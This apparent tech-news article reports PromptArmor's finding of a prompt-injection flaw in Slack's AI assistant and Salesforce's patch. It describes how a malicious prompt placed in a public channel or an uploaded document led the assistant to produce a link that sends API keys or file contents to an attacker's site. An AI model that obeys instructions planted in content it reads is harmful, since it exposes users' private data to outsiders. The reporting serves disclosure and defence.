Security experts have just now discovered a significant vulnerability in Slack’s AI assistant that may lead to sensitive data exposure.
Slack is a platform more than 35 million people use throughout the world, and it introduced its AI tool back in September 2023. The feature summarizes unread messages for users, answers questions, and even searches for files. All of these were very convenient, it turns out, for a very steep price.
The firm said a vulnerability, revealed by security firm PromptArmor, demonstrates an attacker leveraging the AI by crafting a prompt specifically tailored to do so.
Essentially, the vulnerability could allow hackers to extract sensitive information from private Slack channels that they are not a member of.
How the Attack Works
Armor demonstrated working with this, among other things, in the API key theft.
Basically, the attacker would create a public Slack channel, add a malicious prompt, which then the AI assistant would read out in response with the LLM, to generate a clickable URL.
When this URL is clicked, it sends the API key to an attacker-controlled website.
But that’s not all; API keys are not the only thing that can be extracted. According to researchers, this vulnerability enables the extraction of files people upload to Slack.
That the AI reads the files literally means an attacker need not even become part of the workspace to steal sensitive info.
For example, an attacker will only need to embed a malicious prompt inside some document and convince a member of the workspace to upload it, thereby achieving the same results. Even a PDF with vuln instructions could trigger that vulnerability if uploaded to slack.
Salesforce response
Salesforce, which owns the platform, says that they acknowledge the issue and have since fixed it.
A Salesforce spokesperson explained to TechRadar Pro: “After being alerted to the report, we investigated the scenario described in which, under very specific and narrow conditions, a bad actor with existing access on the same slack workspace could attempt to phish certain users for specific data. We have released a patch that resolves the vulnerability, and at this time, we do not have evidence of unauthorized access to customer data.”
However, Armor pointed out that Salesforce did say that “messages posted to public channels can be searched for and viewed by all members of the workspace, regardless of whether they have joined the channel or not. This is intended behavior.”
